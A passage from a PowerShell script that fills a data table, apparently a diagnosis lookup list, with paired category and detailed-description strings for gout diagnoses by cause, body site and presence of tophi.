tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right hip","Lead-induced chronic gout, right hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left hip","Lead-induced chronic gout, left hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left hip","Lead-induced chronic gout, left hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified hip","Lead-induced chronic gout, unspecified hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified hip","Lead-induced chronic gout, unspecified hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right knee","Lead-induced chronic gout, right knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right knee","Lead-induced chronic gout, right knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left knee","Lead-induced chronic gout, left knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left knee","Lead-induced chronic gout, left knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified knee","Lead-induced chronic gout, unspecified knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified knee","Lead-induced chronic gout, unspecified knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right ankle and foot","Lead-induced chronic gout, right ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right ankle and foot","Lead-induced chronic gout, right ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left ankle and foot","Lead-induced chronic gout, left ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left ankle and foot","Lead-induced chronic gout, left ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified ankle and foot","Lead-induced chronic gout, unspecified ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified ankle and foot","Lead-induced chronic gout, unspecified ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, vertebrae","Lead-induced chronic gout, vertebrae, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, vertebrae","Lead-induced chronic gout, vertebrae, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, multiple sites","Lead-induced chronic gout, multiple sites, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, multiple sites","Lead-induced chronic gout, multiple sites, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified site","Drug-induced chronic gout, unspecified site, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified site","Drug-induced chronic gout, unspecified site, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right shoulder","Drug-induced chronic gout, right shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right shoulder","Drug-induced chronic gout, right shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left shoulder","Drug-induced chronic gout, left shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left shoulder","Drug-induced chronic gout, left shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified shoulder","Drug-induced chronic gout, unspecified shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified shoulder","Drug-induced chronic gout, unspecified shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right elbow","Drug-induced chronic gout, right elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right elbow","Drug-induced chronic gout, right elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left elbow","Drug-induced chronic gout, left elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left elbow","Drug-induced chronic gout, left elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified elbow","Drug-induced chronic gout, unspecified elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified elbow","Drug-induced chronic gout, unspecified elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right wrist","Drug-induced chronic gout, right wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right wrist","Drug-induced chronic gout, right wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left wrist","Drug-induced chronic gout, left wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left wrist","Drug-induced chronic gout, left wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified wrist","Drug-induced chronic gout, unspecified wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified wrist","Drug-induced chronic gout, unspecified wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right hand","Drug-induced chronic gout, right hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right hand","Drug-induced chronic gout, right hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left hand","Drug-induced chronic gout, left hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left hand","Drug-induced chronic gout, left hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified hand","Drug-induced chronic gout, unspecified hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified hand","Drug-induced chronic gout, unspecified hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right hip","Drug-induced chronic gout, right hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right hip","Drug-induced chronic gout, right hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left hip","Drug-induced chronic gout, left hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left hip","Drug-induced chronic gout, left hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified hip","Drug-induced chronic gout, unspecified hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified hip","Drug-induced chronic gout, unspecified hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right knee","Drug-induced chronic gout, right knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right knee","Drug-induced chronic gout, right knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left knee","Drug-induced chronic gout, left knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left knee","Drug-induced chronic gout, left knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified knee","Drug-induced chronic gout, unspecified knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified knee","Drug-induced chronic gout, unspecified knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right ankle and foot","Drug-induced chronic gout, right ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, right ankle and foot","Drug-induced chronic gout, right ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left ankle and foot","Drug-induced chronic gout, left ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, left ankle and foot","Drug-induced chronic gout, left ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified ankle and foot","Drug-induced chronic gout, unspecified ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, unspecified ankle and foot","Drug-induced chronic gout, unspecified ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, vertebrae","Drug-induced chronic gout, vertebrae, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, vertebrae","Drug-induced chronic gout, vertebrae, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, multiple sites","Drug-induced chronic gout, multiple sites, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Drug-induced chronic gout, multiple sites","Drug-induced chronic gout, multiple sites, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified site","Chronic gout due to renal impairment, unspecified site, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified site","Chronic gout due to renal impairment, unspecified site, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right shoulder","Chronic gout due to renal impairment, right shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right shoulder","Chronic gout due to renal impairment, right shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left shoulder","Chronic gout due to renal impairment, left shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left shoulder","Chronic gout due to renal impairment, left shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified shoulder","Chronic gout due to renal impairment, unspecified shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified shoulder","Chronic gout due to renal impairment, unspecified shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right elbow","Chronic gout due to renal impairment, right elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right elbow","Chronic gout due to renal impairment, right elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left elbow","Chronic gout due to renal impairment, left elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left elbow","Chronic gout due to renal impairment, left elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified elbow","Chronic gout due to renal impairment, unspecified elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified elbow","Chronic gout due to renal impairment, unspecified elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right wrist","Chronic gout due to renal impairment, right wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right wrist","Chronic gout due to renal impairment, right wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left wrist","Chronic gout due to renal impairment, left wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left wrist","Chronic gout due to renal impairment, left wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified wrist","Chronic gout due to renal impairment, unspecified wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified wrist","Chronic gout due to renal impairment, unspecified wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right hand","Chronic gout due to renal impairment, right hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right hand","Chronic gout due to renal impairment, right hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left hand","Chronic gout due to renal impairment, left hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left hand","Chronic gout due to renal impairment, left hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified hand","Chronic gout due to renal impairment, unspecified hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified hand","Chronic gout due to renal impairment, unspecified hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right hip","Chronic gout due to renal impairment, right hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right hip","Chronic gout due to renal impairment, right hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left hip","Chronic gout due to renal impairment, left hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left hip","Chronic gout due to renal impairment, left hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified hip","Chronic gout due to renal impairment, unspecified hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified hip","Chronic gout due to renal impairment, unspecified hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right knee","Chronic gout due to renal impairment, right knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right knee","Chronic gout due to renal impairment, right knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left knee","Chronic gout due to renal impairment, left knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left knee","Chronic gout due to renal impairment, left knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified knee","Chronic gout due to renal impairment, unspecified knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified knee","Chronic gout due to renal impairment, unspecified knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right ankle and foot","Chronic gout due to renal impairment, right ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, right ankle and foot","Chronic gout due to renal impairment, right ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left ankle and foot","Chronic gout due to renal impairment, left ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, left ankle and foot","Chronic gout due to renal impairment, left ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified ankle and foot","Chronic gout due to renal impairment, unspecified ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, unspecified ankle and foot","Chronic gout due to renal impairment, unspecified ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, vertebrae","Chronic gout due to renal impairment, vertebrae, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, vertebrae","Chronic gout due to renal impairment, vertebrae, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, multiple sites","Chronic gout due to renal impairment, multiple sites, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout due to renal impairment, multiple sites","Chronic gout due to renal impairment, multiple sites, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified site","Other secondary chronic gout, unspecified site, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified site","Other secondary chronic gout, unspecified site, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right shoulder","Other secondary chronic gout, right shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right shoulder","Other secondary chronic gout, right shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left shoulder","Other secondary chronic gout, left shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left shoulder","Other secondary chronic gout, left shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified shoulder","Other secondary chronic gout, unspecified shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified shoulder","Other secondary chronic gout, unspecified shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right elbow","Other secondary chronic gout, right elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right elbow","Other secondary chronic gout, right elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left elbow","Other secondary chronic gout, left elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left elbow","Other secondary chronic gout, left elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified elbow","Other secondary chronic gout, unspecified elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified elbow","Other secondary chronic gout, unspecified elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right wrist","Other secondary chronic gout, right wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right wrist","Other secondary chronic gout, right wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left wrist","Other secondary chronic gout, left wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left wrist","Other secondary chronic gout, left wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified wrist","Other secondary chronic gout, unspecified wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified wrist","Other secondary chronic gout, unspecified wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right hand","Other secondary chronic gout, right hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right hand","Other secondary chronic gout, right hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left hand","Other secondary chronic gout, left hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left hand","Other secondary chronic gout, left hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified hand","Other secondary chronic gout, unspecified hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified hand","Other secondary chronic gout, unspecified hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right hip","Other secondary chronic gout, right hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right hip","Other secondary chronic gout, right hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left hip","Other secondary chronic gout, left hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left hip","Other secondary chronic gout, left hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified hip","Other secondary chronic gout, unspecified hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified hip","Other secondary chronic gout, unspecified hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right knee","Other secondary chronic gout, right knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right knee","Other secondary chronic gout, right knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left knee","Other secondary chronic gout, left knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left knee","Other secondary chronic gout, left knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified knee","Other secondary chronic gout, unspecified knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified knee","Other secondary chronic gout, unspecified knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right ankle and foot","Other secondary chronic gout, right ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, right ankle and foot","Other secondary chronic gout, right ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left ankle and foot","Other secondary chronic gout, left ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, left ankle and foot","Other secondary chronic gout, left ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified ankle and foot","Other secondary chronic gout, unspecified ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, unspecified ankle and foot","Other secondary chronic gout, unspecified ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, vertebrae","Other secondary chronic gout, vertebrae, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, vertebrae","Other secondary chronic gout, vertebrae, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, multiple sites","Other secondary chronic gout, multiple sites, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Other secondary chronic gout, multiple sites","Other secondary chronic gout, multiple sites, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout, unspecified","Chronic gout, unspecified, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Chronic gout, unspecified","Chronic gout, unspecified, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic gout","Idiopathic gout, unspecified site") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, shoulder","Idiopathic gout, right shoulder") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, shoulder","Idiopathic gout, left shoulder") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, shoulder","Idiopathic gout, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, elbow","Idiopathic gout, right elbow") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, elbow","Idiopathic gout, left elbow") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, elbow","Idiopathic gout, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, wrist","Idiopathic gout, right wrist") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, wrist","Idiopathic gout, left wrist") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, wrist","Idiopathic gout, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, hand","Idiopathic gout, right hand") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, hand","Idiopathic gout, left hand") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, hand","Idiopathic gout, unspecified hand") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, hip","Idiopathic gout, right hip") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, hip","Idiopathic gout, left hip") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, hip","Idiopathic gout, unspecified hip") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, knee","Idiopathic gout, right knee") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, knee","Idiopathic gout, left knee") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, knee","Idiopathic gout, unspecified knee") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, ankle and foot","Idiopathic gout, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, ankle and foot","Idiopathic gout, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, ankle and foot","Idiopathic gout, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, vertebrae","Idiopathic gout, vertebrae") + $null = $DiagnosisList.Rows.Add("Idiopathic gout, multiple sites","Idiopathic gout, multiple sites") + $null = $DiagnosisList.Rows.Add("Lead-induced gout","Lead-induced gout, unspecified site") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, shoulder","Lead-induced gout, right shoulder") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, shoulder","Lead-induced gout, left shoulder") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, shoulder","Lead-induced gout, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, elbow","Lead-induced gout, right elbow") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, elbow","Lead-induced gout, left elbow") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, elbow","Lead-induced gout, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, wrist","Lead-induced gout, right wrist") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, wrist","Lead-induced gout, left wrist") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, wrist","Lead-induced gout, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, hand","Lead-induced gout, right hand") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, hand","Lead-induced gout, left hand") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, hand","Lead-induced gout, unspecified hand") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, hip","Lead-induced gout, right hip") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, hip","Lead-induced gout, left hip") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, hip","Lead-induced gout, unspecified hip") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, knee","Lead-induced gout, right knee") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, knee","Lead-induced gout, left knee") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, knee","Lead-induced gout, unspecified knee") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, ankle and foot","Lead-induced gout, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, ankle and foot","Lead-induced gout, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, ankle and foot","Lead-induced gout, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, vertebrae","Lead-induced gout, vertebrae") + $null = $DiagnosisList.Rows.Add("Lead-induced gout, multiple sites","Lead-induced gout, multiple sites") + $null = $DiagnosisList.Rows.Add("Drug-induced gout","Drug-induced gout, unspecified site") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, shoulder","Drug-induced gout, right shoulder") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, shoulder","Drug-induced gout, left shoulder") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, shoulder","Drug-induced gout, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, elbow","Drug-induced gout, right elbow") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, elbow","Drug-induced gout, left elbow") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, elbow","Drug-induced gout, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, wrist","Drug-induced gout, right wrist") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, wrist","Drug-induced gout, left wrist") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, wrist","Drug-induced gout, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, hand","Drug-induced gout, right hand") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, hand","Drug-induced gout, left hand") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, hand","Drug-induced gout, unspecified hand") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, hip","Drug-induced gout, right hip") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, hip","Drug-induced gout, left hip") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, hip","Drug-induced gout, unspecified hip") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, knee","Drug-induced gout, right knee") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, knee","Drug-induced gout, left knee") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, knee","Drug-induced gout, unspecified knee") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, ankle and foot","Drug-induced gout, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, ankle and foot","Drug-induced gout, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, ankle and foot","Drug-induced gout, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, vertebrae","Drug-induced gout, vertebrae") + $null = $DiagnosisList.Rows.Add("Drug-induced gout, multiple sites","Drug-induced gout, multiple sites") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment","Gout due to renal impairment, unspecified site") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, shoulder","Gout due to renal impairment, right shoulder") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, shoulder","Gout due to renal impairment, left shoulder") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, shoulder","Gout due to renal impairment, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, elbow","Gout due to renal impairment, right elbow") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, elbow","Gout due to renal impairment, left elbow") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, elbow","Gout due to renal impairment, unspecified elbow") + $null = 